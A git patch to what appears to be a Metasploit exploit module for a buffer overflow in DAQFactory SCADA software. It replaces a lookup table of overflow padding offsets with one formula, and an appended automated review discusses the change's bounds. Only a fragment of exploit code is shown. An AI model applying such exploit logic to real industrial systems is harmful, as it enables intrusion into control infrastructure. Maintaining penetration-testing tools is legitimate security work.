From 936f3de84cf40291237aeacff76f47558ead2e29 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Tue, 20 Sep 2011 18:56:21 +0000
Subject: [PATCH] This simple math would do the trick
git-svn-id: file:///home/svn/framework3/trunk@13766 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/scada/daq_factory_bof.rb | 26 +------------------
 1 file changed, 1 insertion(+), 25 deletions(-)
diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb
index e37855240c..b7d1c87ce7 100644
--- a/modules/exploits/windows/scada/daq_factory_bof.rb
+++ b/modules/exploits/windows/scada/daq_factory_bof.rb
@@ -84,31 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Correct the offset according to the 2nd IP (DHCP) length
 iplen = datastore['DHCP'].length
-
- if iplen == 15
- offset = 78
- elsif iplen == 14
- offset = 79
- elsif iplen == 13
- offset = 80
- elsif iplen == 12
- offset = 81
- elsif iplen == 11
- offset = 82
- elsif iplen == 10
- offset = 83
- elsif iplen == 9
- offset = 84
- elsif iplen == 8
- offset = 85
- elsif iplen == 7
- offset = 86
- elsif iplen == 6
- offset = 87
- # attack class A ip, slightly unlikly, but just in case.
- elsif iplen == 5
- offset = 88
- end
+ offset = 93-iplen
 if offset >= 80
 pktoffset = offset - 80
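Review bot: `offset = 93-iplen` gives a value for any length of `datastore['DHCP']`, whereas the removed chain only assigned `offset` for lengths 5 through 15 and left it unset otherwise, so the two forms agree only inside that range. Outside it, the old code would presumably have stopped at the `if offset >= 80` comparison, while the new code carries on with an offset the table never contained. To keep the old bounds explicit, a guard before the assignment would do, for example `raise ArgumentError, "DHCP must be a dotted-quad IPv4 address" unless (5..15).include?(iplen)`. The constant is also unexplained once the table is gone; a comment such as `# 93 = 78 + 15, the offset for the longest (15-character) address plus its length` would record where it comes from, and `93 - iplen` with spaces would match the `offset - 80` line below. The enclosing method starts and ends outside this hunk, so any validation done earlier is not visible here.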